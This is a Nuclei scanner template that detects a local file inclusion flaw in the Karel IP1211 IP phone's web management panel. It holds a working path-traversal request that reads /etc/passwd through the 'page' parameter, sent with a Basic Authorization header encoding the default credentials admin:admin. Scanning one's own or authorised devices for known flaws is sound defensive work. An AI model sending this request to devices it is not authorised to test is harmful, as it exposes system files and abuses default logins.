id: karel-ip-phone-lfi info: name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion author: 0x_Akoko severity: high description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: karel,lfi metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" headers: Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # Enhanced by mp on 2022/08/03